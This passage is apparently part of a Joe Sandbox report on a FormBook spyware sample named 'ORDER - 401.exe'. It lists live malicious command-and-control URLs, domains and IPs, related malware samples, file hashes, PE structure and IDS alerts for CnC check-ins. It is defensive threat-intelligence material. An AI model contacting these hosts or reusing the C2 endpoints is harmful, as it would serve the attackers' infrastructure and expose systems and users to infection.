                                                                            http://www.guacamask.online/sk-logabpstatus.php?a=MnJENVJwV2lhZW0rV2U4VmdEend6Tm5ucmlLSndTR0pwVHBzV3ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.kkpmoneysocial.topZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              162.0.217.35
                                                                              		54248711.xyzCanada
                                                                              		35893ACPCAtrue
                                                                              154.208.202.225
                                                                              		www.zoomlive.liveSeychelles
                                                                              		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                              209.74.77.107
                                                                              		www.happyjam.lifeUnited States
                                                                              		31744MULTIBAND-NEWHOPEUStrue
                                                                              154.12.28.184
                                                                              		www.7261ltajbc.bondUnited States
                                                                              		174COGENT-174UStrue
                                                                              172.67.129.38
                                                                              		www.kkpmoneysocial.topUnited States
                                                                              		13335CLOUDFLARENETUStrue
                                                                              84.32.84.32
                                                                              		appsolucao.shopLithuania
                                                                              		33922NTT-LT-ASLTtrue
                                                                              208.91.197.27
                                                                              		www.guacamask.onlineVirgin Islands (BRITISH)
                                                                              		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                              81.2.196.19
                                                                              		bagatowcannabis.cloudCzech Republic
                                                                              		24806INTERNET-CZKtis238403KtisCZtrue
                                                                              77.68.64.45
                                                                              		www.dietcoffee.onlineUnited Kingdom
                                                                              		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                              104.21.77.71
                                                                              		www.aziziyeescortg.xyzUnited States
                                                                              		13335CLOUDFLARENETUStrue
                                                                              172.67.220.36
                                                                              		www.supernutra01.onlineUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              13.228.81.39
                                                                              		dns.ladipage.comUnited States
                                                                              		16509AMAZON-02USfalse
                                                                              185.42.14.166
                                                                              		www.artkub.netRussian Federation
                                                                              		56784MULTIHOST-ASRUtrue

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1575104
                                                                              Start date and time:2024-12-14 13:48:09 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 11m 27s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:10
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:ORDER - 401.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@11/2@16/13
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 96%
                                                                              • Number of executed functions: 102
                                                                              • Number of non-executed functions: 289
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.231.128.65, 20.231.128.66, 40.126.53.17, 20.190.181.6, 20.190.181.23, 40.126.53.14, 20.190.181.1, 40.126.53.18, 13.107.246.63, 23.218.208.109, 4.245.163.56, 20.12.23.50
                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                              • Execution Graph export aborted for target ZaZCnGdXtY.exe, PID 3136 because it is empty
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              07:49:24API Interceptor1x Sleep call for process: ORDER - 401.exe modified
                                                                              07:50:21API Interceptor9208594x Sleep call for process: ieUnatt.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              209.74.77.107ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                              • www.learnwithus.site/a6qk/
                                                                              PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                              • www.beyondfitness.live/fbpt/
                                                                              DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                              • www.happyjam.life/4ii9/
                                                                              SRT68.exeGet hashmaliciousFormBookBrowse
                                                                              • www.liveplah.live/2bf0/
                                                                              UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                              • www.gadgetre.info/8q8w/
                                                                              PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                              • www.learnwithus.site/alu5/
                                                                              Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                              • www.learnwithus.site/alu5/
                                                                              SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                              • www.happyjam.life/4ii9/
                                                                              quotation.exeGet hashmaliciousFormBookBrowse
                                                                              • www.gadgetre.info/8q8w/
                                                                              Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • www.beyondfitness.live/fbpt/
                                                                              154.12.28.184Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                172.67.129.38DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.kkpmoneysocial.top/dlkm/
                                                                                SecuriteInfo.com.Trojan.Siggen17.15714.28660.exeGet hashmaliciousLokibotBrowse
                                                                                • 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
                                                                                SKCN_Fixture_Notes.xlsxGet hashmaliciousLokibotBrowse
                                                                                • 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
                                                                                Fixture_Note_Voy No_5.xlsxGet hashmaliciousLokibotBrowse
                                                                                • 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
                                                                                A1o6AW9jZm.exeGet hashmaliciousLokibotBrowse
                                                                                • 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
                                                                                uWyecbmxRZ.exeGet hashmaliciousLokibotBrowse
                                                                                • 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
                                                                                MT103_Swift Copy.xlsxGet hashmaliciousLokibotBrowse
                                                                                • 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.aziziyeescortg.xyzrPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.77.71
                                                                                SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 188.114.96.3
                                                                                www.guacamask.onlinePO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                                • 208.91.197.27
                                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                • 208.91.197.27
                                                                                www.kkpmoneysocial.topDO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 172.67.129.38
                                                                                www.supernutra01.online01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.24.198
                                                                                DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.220.36
                                                                                PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                                • 104.21.24.198
                                                                                PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.24.198
                                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.24.198
                                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 104.21.24.198
                                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.220.36
                                                                                CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.220.36
                                                                                Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.220.36
                                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.220.36
                                                                                dns.ladipage.comORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                • 18.139.62.226
                                                                                SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                • 18.139.62.226
                                                                                CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.228.81.39
                                                                                MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.228.81.39
                                                                                QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.228.81.39
                                                                                New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                • 54.179.173.60
                                                                                Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 18.139.62.226
                                                                                XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 13.228.81.39
                                                                                Swift copy.exeGet hashmaliciousFormBookBrowse
                                                                                • 18.139.62.226
                                                                                wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                                • 54.179.173.60
                                                                                www.7261ltajbc.bondQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                • 154.12.28.184
                                                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                • 154.12.28.184

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                MULTIBAND-NEWHOPEUSSC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.58
                                                                                PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.79.40
                                                                                ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.107
                                                                                Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                • 209.74.95.101
                                                                                SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.79.42
                                                                                Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.187
                                                                                CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.79.40
                                                                                ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.79.41
                                                                                PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.107
                                                                                Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.108
                                                                                COGENT-174UShttps://newsystem-upgrade-securitycheck.b-cdn.net/verify-human.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                • 143.244.56.49
                                                                                elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 149.50.135.117
                                                                                elitebotnet.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 199.98.114.214
                                                                                elitebotnet.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 38.200.160.110
                                                                                elitebotnet.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 38.78.162.234
                                                                                Quotation Request-349849.exeGet hashmaliciousFormBookBrowse
                                                                                • 206.238.89.119
                                                                                RFQ.pdf.exeGet hashmaliciousXWormBrowse
                                                                                • 154.39.0.138
                                                                                new1.exeGet hashmaliciousRedLineBrowse
                                                                                • 38.180.72.54
                                                                                kiyan.exeGet hashmaliciousRedLineBrowse
                                                                                • 38.180.109.140
                                                                                sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 149.29.31.81
                                                                                ACPCAb3astmode.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 162.64.255.227
                                                                                loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 162.54.237.100
                                                                                01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.0.213.94
                                                                                Josho.x86.elfGet hashmaliciousUnknownBrowse
                                                                                • 162.8.63.18
                                                                                hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                • 162.64.255.255
                                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 162.49.96.105
                                                                                UToB1WBfv0.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 162.55.60.2
                                                                                AGrsqxaSjd.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 162.55.60.2
                                                                                Owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                • 162.1.10.3
                                                                                Owari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 162.137.25.149
                                                                                DXTL-HKDXTLTseungKwanOServiceHKorder confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                • 156.232.181.155
                                                                                sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.189.159
                                                                                x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.242.44
                                                                                nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.189.172
                                                                                hax.x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.217.38
                                                                                hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                • 122.10.72.123
                                                                                hax.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.217.25
                                                                                arm5-20241210-1051.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.189.149
                                                                                arm7-20241210-1051.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.189.191
                                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.235.189.161

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER - 401.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                C:\Users\user\AppData\Local\Temp\086604I_P

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.121297215059106
                                                                                Encrypted:false
                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.715959561305726
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:ORDER - 401.exe
                                                                                File size:836'608 bytes
                                                                                MD5:0b1dccaee94a61586e90e0a62ab20100
                                                                                SHA1:e0af85037a69f302e5f9f7343253ad6e1c800fd5
                                                                                SHA256:c614c851b9fe906089e94db09ebd858fc5e4fa04613d92cd8566b3d34297381b
                                                                                SHA512:ee7668fa35ed679958aa0e1519bb18e12bdefa0ffa43328cb1c935b98998da2b793316b21922b35761106755e6e7818a898a41a2c38a15a7a48287730ee066fb
                                                                                SSDEEP:12288:PC25usx+XtxC0dI8jQ+NuECKIKY7nCKhENpCJCCwCoWoNZ6m51rtzC+J:xxadnjQECKdKhUpCQooWcxX
                                                                                TLSH:2205014532658807E6B697F00A71F17407F92EAEA922E3DA4EC56CDFB8E6F504940353
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BMg..............0...... ........... ........@.. ....................... ............@................................

                                                                                File Icon

                                                                                Icon Hash:5ba4a66a2a263095

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4cc0a2
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x674D42E9 [Mon Dec 2 05:17:29 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xcc0500x4f.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x1c3c.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000xca0a80xca20096eb76abe5a0384b29ce455032867670False0.8860677083333334data7.7236492887754595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0xce0000x1c3c0x1e00ca2e365c233ae6b032af2ac84983c84cFalse0.8053385416666666data7.065084013421438IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0xd00000xc0x200e277372421e3822912d561f3a9de1af1False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xce1000x164fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.951672211521625
                                                                                RT_GROUP_ICON0xcf7600x14data1.05
                                                                                RT_VERSION0xcf7840x2b8COM executable for DOS0.44971264367816094
                                                                                RT_MANIFEST0xcfa4c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-14T13:50:00.870710+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549801154.12.28.18480TCP
                                                                                2024-12-14T13:50:00.870710+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549801154.12.28.18480TCP
                                                                                2024-12-14T13:50:18.578499+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54984313.228.81.3980TCP
                                                                                2024-12-14T13:50:21.234518+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54984913.228.81.3980TCP
                                                                                2024-12-14T13:50:23.906363+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54985913.228.81.3980TCP
                                                                                2024-12-14T13:50:26.635454+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54986513.228.81.3980TCP
                                                                                2024-12-14T13:50:26.635454+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54986513.228.81.3980TCP
                                                                                2024-12-14T13:50:33.366325+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549882172.67.129.3880TCP
                                                                                2024-12-14T13:50:36.030415+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549888172.67.129.3880TCP
                                                                                2024-12-14T13:50:38.712022+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549895172.67.129.3880TCP
                                                                                2024-12-14T13:50:41.363963+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549901172.67.129.3880TCP
                                                                                2024-12-14T13:50:41.363963+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549901172.67.129.3880TCP
                                                                                2024-12-14T13:50:48.616036+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549917185.42.14.16680TCP
                                                                                2024-12-14T13:50:51.276243+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549929185.42.14.16680TCP
                                                                                2024-12-14T13:50:53.959214+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549935185.42.14.16680TCP
                                                                                2024-12-14T13:50:56.996275+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549942185.42.14.16680TCP
                                                                                2024-12-14T13:50:56.996275+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549942185.42.14.16680TCP
